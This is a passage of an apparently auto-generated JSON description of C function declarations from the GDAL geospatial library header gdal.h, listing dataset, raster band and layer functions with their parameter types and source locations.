} }, { "tag": "parameter", "name": "nBandSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "GDALAsyncReaderH" } }, { "tag": "function", "name": "GDALEndAsyncReader", "ns": 0, "location": "/usr/include/gdal/gdal.h:642:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "hAsynchReaderH", "type": { "tag": "GDALAsyncReaderH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDatasetRasterIO", "ns": 0, "location": "/usr/include/gdal/gdal.h:644:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nDSXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pBuffer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nBXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBDataType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nBandCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panBandCount", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "nPixelSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nLineSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBandSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALDatasetRasterIOEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:651:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nDSXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pBuffer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nBXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBDataType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nBandCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panBandCount", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "nPixelSpace", "type": { "tag": "GSpacing" } }, { "tag": "parameter", "name": "nLineSpace", "type": { "tag": "GSpacing" } }, { "tag": "parameter", "name": "nBandSpace", "type": { "tag": "GSpacing" } }, { "tag": "parameter", "name": "psExtraArg", "type": { "tag": ":pointer", "type": { "tag": "GDALRasterIOExtraArg" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALDatasetAdviseRead", "ns": 0, "location": "/usr/include/gdal/gdal.h:659:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "nDSXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBDataType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nBandCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panBandCount", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetProjectionRef", "ns": 0, "location": "/usr/include/gdal/gdal.h:664:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALSetProjection", "ns": 0, "location": "/usr/include/gdal/gdal.h:665:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetGeoTransform", "ns": 0, "location": "/usr/include/gdal/gdal.h:666:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALSetGeoTransform", "ns": 0, "location": "/usr/include/gdal/gdal.h:667:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetGCPCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:669:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetGCPProjection", "ns": 0, "location": "/usr/include/gdal/gdal.h:670:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALGetGCPs", "ns": 0, "location": "/usr/include/gdal/gdal.h:671:38", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } }, { "tag": "function", "name": "GDALSetGCPs", "ns": 0, "location": "/usr/include/gdal/gdal.h:672:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetInternalHandle", "ns": 0, "location": "/usr/include/gdal/gdal.h:675:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "GDALReferenceDataset", "ns": 0, "location": "/usr/include/gdal/gdal.h:676:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDereferenceDataset", "ns": 0, "location": "/usr/include/gdal/gdal.h:677:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALReleaseDataset", "ns": 0, "location": "/usr/include/gdal/gdal.h:678:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALBuildOverviews", "ns": 0, "location": "/usr/include/gdal/gdal.h:681:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetOpenDatasets", "ns": 0, "location": "/usr/include/gdal/gdal.h:683:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "GDALDatasetH" } } } }, { "tag": "parameter", "name": "pnCount", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGetAccess", "ns": 0, "location": "/usr/include/gdal/gdal.h:684:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALFlushCache", "ns": 0, "location": "/usr/include/gdal/gdal.h:685:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALCreateDatasetMaskBand", "ns": 0, "location": "/usr/include/gdal/gdal.h:688:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "nFlags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALDatasetCopyWholeRaster", "ns": 0, "location": "/usr/include/gdal/gdal.h:690:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSrcDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "hDstDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRasterBandCopyWholeRaster", "ns": 0, "location": "/usr/include/gdal/gdal.h:694:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSrcBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "hDstBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "constpapszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRegenerateOverviews", "ns": 0, "location": "/usr/include/gdal/gdal.h:700:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSrcBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nOverviewCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pahOverviewBands", "type": { "tag": ":pointer", "type": { "tag": "GDALRasterBandH" } } }, { "tag": "parameter", "name": "pszResampling", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALDatasetGetLayerCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:705:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDatasetGetLayer", "ns": 0, "location": "/usr/include/gdal/gdal.h:706:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "GDALDatasetGetLayerByName", "ns": 0, "location": "/usr/include/gdal/gdal.h:707:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "GDALDatasetDeleteLayer", "ns": 0, "location": "/usr/include/gdal/gdal.h:708:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "GDALDatasetCreateLayer", "ns": 0, "location": "/usr/include/gdal/gdal.h:709:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "GDALDatasetCopyLayer", "ns": 0, "location": "/usr/include/gdal/gdal.h:712:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "GDALDatasetResetReading", "ns": 0, "location": "/usr/include/gdal/gdal.h:714:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDatasetGetNextFeature", "ns": 0, "location": "/usr/include/gdal/gdal.h:715:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "phBelongingLayer", "type": { "tag": ":pointer", "type": { "tag": "OGRLayerH" } } }, { "tag": "parameter", "name": "pdfProgressPct", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "pfnProgress", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "pProgressData", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "OGRFeatureH" } }, { "tag": "function", "name": "GDALDatasetTestCapability", "ns": 0, "location": "/usr/include/gdal/gdal.h:720:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDatasetExecuteSQL", "ns": 0, "location": "/usr/include/gdal/gdal.h:721:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRLayerH" } }, { "tag": "function", "name": "GDALDatasetReleaseResultSet", "ns": 0, "location": "/usr/include/gdal/gdal.h:723:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDatasetGetStyleTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:724:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": "OGRStyleTableH" } }, { "tag": "function", "name": "GDALDatasetSetStyleTableDirectly", "ns": 0, "location": "/usr/include/gdal/gdal.h:725:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDatasetSetStyleTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:726:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALDatasetStartTransaction", "ns": 0, "location": "/usr/include/gdal/gdal.h:727:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "bForce", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "GDALDatasetCommitTransaction", "ns": 0, "location": "/usr/include/gdal/gdal.h:728:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "GDALDatasetRollbackTransaction", "ns": 0, "location": "/usr/include/gdal/gdal.h:729:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "typedef", "ns": 0, "name": "GDALDerivedPixelFunc", "location": "/usr/include/gdal/gdal.h:766:3", "type": { "tag": ":function-pointer" } }, { "tag": "function", "name": "GDALGetRasterDataType", "ns": 0, "location": "/usr/include/gdal/gdal.h:771:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "GDALDataType" } }, { "tag": "function", "name": "GDALGetBlockSize", "ns": 0, "location": "/usr/include/gdal/gdal.h:773:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "pnXSize", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnYSize", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGetActualBlockSize", "ns": 0, "location": "/usr/include/gdal/gdal.h:776:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nXBlockOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYBlockOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pnXValid", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnYValid", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRasterAdviseRead", "ns": 0, "location": "/usr/include/gdal/gdal.h:779:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRB", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nDSXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBDataType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRasterIO", "ns": 0, "location": "/usr/include/gdal/gdal.h:784:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nDSXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pBuffer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nBXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBDataType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nPixelSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nLineSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRasterIOEx", "ns": 0, "location": "/usr/include/gdal/gdal.h:789:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nDSXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nDSYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pBuffer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nBXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBDataType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nPixelSpace", "type": { "tag": "GSpacing" } }, { "tag": "parameter", "name": "nLineSpace", "type": { "tag": "GSpacing" } }, { "tag": "parameter", "name": "psExtraArg", "type": { "tag": ":pointer", "type": { "tag": "GDALRasterIOExtraArg" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALReadBlock", "ns": 0, "location": "/usr/include/gdal/gdal.h:794:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALWriteBlock", "ns": 0, "location": "/usr/include/gdal/gdal.h:795:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALGetRasterBandXSize", "ns": 0, "location": "/usr/include/gdal/gdal.h:796:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetRasterBandYSize", "ns": 0, "location": "/usr/include/gdal/gdal.h:797:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetRasterAccess", "ns": 0, "location": "/usr/include/gdal/gdal.h:798:32", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterBandH" } }], "return-type": { "tag": "GDALAccess" } }, { "tag": "function", "name": "GDALGetBandNumber", "ns": 